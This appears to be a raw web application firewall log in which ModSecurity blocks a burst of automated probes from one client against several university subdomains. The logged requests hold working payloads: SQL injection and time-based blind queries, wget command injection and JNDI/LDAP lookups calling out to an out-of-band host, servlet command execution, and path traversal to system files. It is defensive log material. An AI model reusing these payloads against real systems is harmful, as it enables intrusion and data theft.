[Tue Aug 29 11:30:48.344572 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10eMCo-f0AAAOOuZgAAAAW"]
[Tue Aug 29 11:30:48.365182 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg4q87xxakm3dfg.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPiBjEAAAAB"]
[Tue Aug 29 11:30:48.367620 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10eMCo-f0AAAPxBUcAAAAS"]
[Tue Aug 29 11:30:48.368991 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAO878gAAAAF"]
[Tue Aug 29 11:30:48.384623 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAPOha8AAAAa"]
[Tue Aug 29 11:30:48.386731 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAOM4ZEAAAAU"]
[Tue Aug 29 11:30:48.389369 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAOKNq0AAAAK"]
[Tue Aug 29 11:30:48.392115 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAO878kAAAAF"]
[Tue Aug 29 11:30:49.347105 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg3gb3fc616jmm9.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10ecCo-f0AAAO878wAAAAF"]
[Tue Aug 29 11:30:49.422860 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10ecCo-f0AAAOKNrEAAAAK"]
[Tue Aug 29 11:30:50.324469 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10esCo-f0AAAPxBUwAAAAS"]
[Tue Aug 29 11:30:50.379689 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPxBU0AAAAS"]
[Tue Aug 29 11:30:50.382533 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPpWfAAAAAI"]
[Tue Aug 29 11:30:50.414325 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPmhOYAAAAV"]
[Tue Aug 29 11:30:50.415867 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAOKNrUAAAAK"]
[Tue Aug 29 11:30:50.436081 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAOOuZ8AAAAW"]
[Tue Aug 29 11:30:51.315618 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAOOuaAAAAAW"]
[Tue Aug 29 11:30:51.320695 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPPSyQAAAAd"]
[Tue Aug 29 11:30:51.324168 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg33x9fcc13daje.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPmhOgAAAAV"]
[Tue Aug 29 11:30:51.327438 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg6kwwr16aefegj.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPxBVAAAAAS"]
[Tue Aug 29 11:30:51.336196 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgt3qc4x76t9arc.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAOOuaEAAAAW"]
[Tue Aug 29 11:30:51.350754 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPOhbcAAAAa"]
[Tue Aug 29 11:30:51.351217 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPQkhoAAAAe"]
[Tue Aug 29 11:30:51.359481 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAOOuaIAAAAW"]
[Tue Aug 29 11:30:51.373017 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgw7bphsc7o4mtu.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPxBVIAAAAS"]
[Tue Aug 29 11:30:51.376760 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgytp693yw9dsmz.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPDn1UAAAAP"]
[Tue Aug 29 11:30:51.381270 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAO879UAAAAF"]
[Tue Aug 29 11:30:51.395035 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPxBVMAAAAS"]
[Tue Aug 29 11:30:51.396894 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPmhOsAAAAV"]
[Tue Aug 29 11:30:51.399487 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPPSyYAAAAd"]
